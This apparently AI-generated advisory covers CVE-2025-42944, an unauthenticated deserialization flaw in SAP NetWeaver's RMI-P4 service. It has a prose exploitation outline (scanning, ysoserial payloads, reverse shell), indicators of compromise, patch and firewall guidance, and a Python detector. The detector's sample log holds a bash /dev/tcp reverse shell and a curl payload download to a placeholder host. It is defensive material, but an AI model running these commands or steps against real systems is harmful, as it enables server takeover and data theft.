CVE-2025-42944
SAP NetWeaver Application Server Java vulnerability analysis and mitigation

Overview

CVE-2025-42944 is a critical deserialization vulnerability in the RMI-P4 module of SAP NetWeaver Application Server Java that allows unauthenticated remote attackers to execute arbitrary operating system commands by submitting malicious serialized Java objects to the exposed P4 port. The vulnerability affects SAP NetWeaver SERVERCORE version 7.50 and was publicly disclosed on September 9, 2025, coinciding with SAP's September 2025 Patch Day. It carries a CVSS v3.1 base score of 10.0 (Critical), the maximum possible severity (Red Hat CVE, ENISA EUVD, SAP Security Notes).

Technical details

The root cause is deserialization of untrusted data (CWE-502) within the RMI-P4 module, SAP's Remote Method Invocation implementation over its proprietary P4 protocol. An unauthenticated attacker can send a crafted serialized Java object directly to the open P4 port; when the server deserializes it, the embedded gadget chain triggers arbitrary OS command execution in the context of the SAP service account. The attack requires no authentication and no user interaction and has low complexity: the P4 port is reachable over the network and the payload is deserialized without any validation of its contents. The vulnerability is mapped to CAPEC-586 (Object Injection), and a public proof-of-concept exploit has been published (GitHub PoC, RedRays Blog, ZeroPath Blog).

Impact

Successful exploitation grants an unauthenticated attacker full OS command execution on the affected SAP NetWeaver server, resulting in complete compromise of confidentiality, integrity, and availability. Attackers can exfiltrate sensitive business data, modify or destroy system components, install backdoors or ransomware, and use the compromised SAP server as a pivot point for lateral movement within the enterprise network. Given SAP NetWeaver's role as a core ERP platform in large enterprises and government organizations, exploitation could expose critical financial, HR, and operational data (Feedly Intel, Arctic Wolf, Security Affairs).

Exploitation steps

  1. Reconnaissance: Identify internet-facing or internally exposed SAP NetWeaver SERVERCORE 7.50 instances using tools like Shodan, Censys, or FOFA, searching for open P4 ports. P4 listens on TCP 5NN04, where NN is the two-digit SAP instance number (50004 for instance 00, 50104 for instance 01); these are AS Java ports and are distinct from the message server ports.
  2. Port identification: Confirm the RMI-P4 service is accessible by probing the target port for SAP-specific protocol banners or responses.
  3. Payload crafting: Construct a malicious serialized Java object payload using tools such as ysoserial or similar Java deserialization exploit frameworks, targeting gadget chains compatible with SAP NetWeaver's classpath.
  4. Payload delivery: Submit the crafted serialized payload directly to the open RMI-P4 port without any authentication credentials.
  5. Command execution: The SAP NetWeaver server deserializes the untrusted Java object, triggering the embedded gadget chain and executing arbitrary OS commands as the SAP service account (e.g., establishing a reverse shell, creating a backdoor user, or exfiltrating data).
  6. Post-exploitation: Use the gained shell access to escalate privileges, move laterally within the network, or deploy persistent malware (GitHub PoC, RedRays Blog, ZeroPath Blog).

Indicators of compromise

  • Network: Unexpected inbound connections to SAP RMI-P4 ports (e.g., TCP 50004, 50104) from external or untrusted IP addresses; outbound connections from the SAP server to unknown external IPs (potential reverse shell or C2 traffic).
  • Logs: SAP system logs showing Java deserialization errors or unexpected class loading events in the RMI-P4 service; OS-level audit logs recording unusual process spawning by the SAP service account (e.g., cmd.exe, /bin/bash, powershell.exe, curl, wget).
  • Process: Child processes spawned by the SAP AS Java server process (jstart on Linux/UNIX; jstart.exe or java.exe on Windows) executing system commands, network utilities, or scripting interpreters that are not typical for normal SAP operations.
  • File System: New or modified files in SAP installation directories, unexpected scripts or executables, new scheduled tasks or cron jobs created by the SAP service account, or web shells placed in accessible directories.
  • Registry/Config: Unauthorized changes to SAP configuration files or new user accounts created in the OS or SAP system following exploitation (Arctic Wolf, RedRays Blog).
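The process-based indicators above can be turned into a small detector. The following is an added example, not code from the original report or from SAP. Its input is a constructed, simplified process-creation log (one event per line, key=value fields, loosely modelled on what an EDR or auditd execve record carries); the field names, the sample events, the host and user names and the 203.0.113.7 address are all assumptions of this example. The rule it implements is the one the indicator describes: the SAP AS Java server process (jstart, jstart.exe, java.exe) spawning a shell, script interpreter or network utility.

```python
import re
from dataclasses import dataclass

# Images that run the SAP AS Java server node (Linux/UNIX and Windows).
SAP_JAVA_PARENTS = {"jstart", "jstart.exe", "java", "java.exe"}

# Interpreters and network utilities a deserialization gadget chain
# typically spawns; extend this to match the platform's own tooling.
SUSPICIOUS_CHILDREN = {
    "sh", "bash", "dash", "ksh", "cmd.exe", "powershell.exe", "pwsh", "pwsh.exe",
    "curl", "wget", "nc", "ncat", "python", "python3", "perl", "certutil.exe",
}

# Constructed sample events (assumed format, not real telemetry): five events,
# two benign (a normal SAP child process, and a shell started by cron rather
# than by the SAP node) and three that match post-deserialization behaviour.
SAMPLE_EVENTS = r"""
ts=2025-09-10T08:01:12Z host=sapj01 puser=j01adm pimage=/usr/sap/J01/J00/exe/jstart image=/usr/sap/J01/J00/exe/sapcpe cmdline="sapcpe pf=/usr/sap/J01/SYS/profile/J01_J00_sapj01"
ts=2025-09-10T08:03:44Z host=sapj01 puser=j01adm pimage=/usr/sap/J01/J00/exe/jstart image=/bin/sh cmdline="sh -c 'bash -i >& /dev/tcp/203.0.113.7/4444 0>&1'"
ts=2025-09-10T08:05:01Z host=sapj01 puser=root pimage=/usr/sbin/cron image=/usr/bin/bash cmdline="/usr/bin/bash /usr/sap/J01/backup.sh"
ts=2025-09-10T08:06:30Z host=sapj01 puser=j01adm pimage=/usr/sap/J01/J00/exe/jstart image=/usr/bin/curl cmdline="curl -s http://203.0.113.7/x -o /tmp/.x"
ts=2025-09-10T09:12:05Z host=sapj02 puser=SAPServiceJ01 pimage=D:\usr\sap\J01\J00\exe\jstart.exe image=C:\Windows\System32\cmd.exe cmdline="cmd.exe /c whoami"
"""

# key=value pairs; a double-quoted value may contain spaces and '=' signs.
_KV = re.compile(r'(\w+)=("[^"]*"|\S+)')


def parse_event(line: str) -> dict:
    """Parse one event line into a dict of its fields (quotes stripped)."""
    return {key: value.strip('"') for key, value in _KV.findall(line)}


def image_name(path: str) -> str:
    """Executable name without its directory, case-folded; accepts / and \\ separators."""
    return re.split(r"[\\/]", path)[-1].lower()


@dataclass
class Alert:
    ts: str
    host: str
    user: str
    parent: str
    child: str
    cmdline: str


def detect(log_text: str) -> list[Alert]:
    """Return one Alert per event where an SAP AS Java process spawns a suspicious child."""
    alerts = []
    for line in log_text.splitlines():
        event = parse_event(line)
        if not event:
            continue
        parent = image_name(event.get("pimage", ""))
        child = image_name(event.get("image", ""))
        if parent in SAP_JAVA_PARENTS and child in SUSPICIOUS_CHILDREN:
            alerts.append(Alert(
                ts=event.get("ts", ""),
                host=event.get("host", ""),
                user=event.get("puser", ""),
                parent=parent,
                child=child,
                cmdline=event.get("cmdline", ""),
            ))
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(f"{alert.ts} {alert.host} {alert.parent} -> {alert.child} "
              f"as {alert.user}: {alert.cmdline}")
```

On the sample data this flags the reverse shell, the curl download and the Windows cmd.exe spawn, and ignores the cron-launched bash because its parent is not the SAP node. In production the parent match should be tightened to the actual SAP kernel path (for example /usr/sap/<SID>/<instance>/exe/) so an unrelated java process elsewhere on the host does not trigger it.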

Mitigation and workarounds

SAP addressed this vulnerability as part of the September 2025 Patch Day; organizations should apply SAP Security Note 3634501 immediately, which provides the official patch for SAP NetWeaver SERVERCORE 7.50 (SAP Security Notes Sep 2025, SAP Note 3634501). As an interim workaround, restrict network access to the P4 port family (TCP 5NN04, together with 5NN05 and 5NN06 for the HTTP-tunneled and SSL variants of P4) using firewall rules and network segmentation, so that these ports are reachable only from the administrative hosts and application servers that need them and never from untrusted networks or the internet. Organizations should also monitor for suspicious deserialization activity and child processes of the SAP Java process, and review SAP service account privileges to limit the blast radius of any exploitation (Onapsis Sep 2025, Arctic Wolf).

Community reactions

The vulnerability received significant attention from the security community upon disclosure, with multiple outlets including BleepingComputer, The Hacker News, Security Affairs, and Ars Technica covering it as a maximum-severity SAP flaw (BleepingComputer, The Hacker News). SAP security specialists Onapsis and SecurityBridge published detailed patch day analyses highlighting CVE-2025-42944 as the most critical issue of the September 2025 cycle (Onapsis Sep 2025, SecurityBridge). National CERTs including Ireland's NCSC, Belgium's CCB, Singapore's CSA, and Pakistan's NCERT issued advisories urging immediate patching, reflecting the broad enterprise impact of the vulnerability. Social media discussions on Mastodon, Bluesky, and Reddit highlighted the urgency given the CVSS 10.0 score and public PoC availability.

Source: This report was generated using AI.

Related SAP NetWeaver Application Server Java vulnerabilities:

| CVE ID | Severity | Score | Technology / Component | CPE | CISA KEV exploitation | Has fix | Publication date |
|---|---|---|---|---|---|---|---|
| CVE-2025-42944 | CRITICAL | 10 | SAP NetWeaver Application Server Java | cpe:2.3:a:sap:netweaver_application_server_java | No | Yes | Sep 09, 2025 |
| CVE-2026-40128 | CRITICAL | 9 | SAP NetWeaver Application Server Java | cpe:2.3:a:sap:netweaver_application_server_java | No | Yes | Jun 09, 2026 |
| CVE-2026-27674 | MEDIUM | 6.1 | SAP NetWeaver Application Server Java | cpe:2.3:a:sap:netweaver_application_server_java | No | Yes | Apr 14, 2026 |
| CVE-2025-42926 | MEDIUM | 5.3 | SAP NetWeaver Application Server Java | cpe:2.3:a:sap:netweaver_application_server_java | No | Yes | Sep 09, 2025 |
| CVE-2026-23686 | LOW | 3.4 | SAP NetWeaver Application Server Java | cpe:2.3:a:sap:netweaver_application_server_java | No | Yes | Feb 10, 2026 |
